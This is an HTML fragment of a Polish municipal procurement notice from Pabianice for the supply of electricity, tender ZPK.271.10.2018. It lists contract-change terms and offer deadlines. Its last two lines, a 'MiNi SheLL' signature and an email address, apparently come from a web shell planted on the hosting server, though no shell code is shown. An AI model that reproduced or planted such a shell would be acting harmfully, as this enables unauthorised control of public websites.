<br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Wzór umowy generalnej, według którego zostanie podpisana umowa z Wykonawcą, zawiera załącznik nr 6 do specyfikacji istotnych warunków zamówienia oraz umowy szczegółowe z każdym podmiotem uczestniczącym w niniejszym postępowaniu (wymieniony w Rozdziale III, punkt 1) - istotne dla stron postanowienia umowy zawarte są w załączniku nr 7 do specyfikacji istotnych warunków zamówienia.Istotne zmiany w postanowieniach umowy:1.	Zmiana zakresu zamówienia - w przypadku wystąpienia nieprzewidzialnych okoliczności, których nie można było przewidzieć na etapie SIWZ (np. zmiana unormowań prawnych, wytycznych, wystąpienia zmiany okoliczności powodującej, że wykonanie zamówienia w zakresie wskazanym w SIWZ i Umowie nie leży w interesie publicznym, zmiany są korzystne dla Zamawiającego). Fakt ten ma być potwierdzony przez stronę występującą z wnioskiem o dokonanie zmian i zaakceptowany przez stronę drugą.2.	Zmiana przedstawicieli stron w przypadku niemożności pełnienia przez nich powierzonych funkcji. 3.	Wykonawca musi przedstawić w tym celu odpowiednie dokumenty wskazujące na zaistnienie danego zdarzenia.4.	W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT.5.	W przypadku konieczności zmiany mocy umownej, której nie można było przewidzieć na etapie przygotowania SIWZ.6.	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp: zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy, zmiana danych teleadresowych, zmiana osób wskazanych do kontaktu ze Stronami.7.	Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 144 ustawy Prawo zamówień publicznych .</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-06-12</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">1.	Miejsce i termin składania ofert Ofertę wraz wymaganymi załącznikami należy umieścić w zamkniętej kopercie opatrzonej danymi wykonawcy oraz opisem ,,Oferta w postępowaniu ZPK.271.10.2018 na: ,,Dostawę energii elektrycznej" - otworzyć na otwarciu ofert w dniu 12.06.2018 r. o godz. 13:00 i złożyć pod adresem Urząd Miejski w Pabianicach - Biuro Obsługi Interesanta, ul. Zamkowa 16, 95-200 Pabianice do dnia 12.06.2018 roku do godziny 12:00. Liczy się data i godzina wpływu do siedziby Zamawiającego, a nie data jej wysłania przesyłką pocztową czy kurierską. Wszystkie oferty otrzymane przez Zamawiającego po terminie podanym powyżej zostaną zwrócone Wykonawcom, nieotwarte.2.	Miejsce i termin otwarcia ofert Otwarcie ofert nastąpi dnia 12.06.2018 roku o godz. 13:00 w siedzibie Zamawiającego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com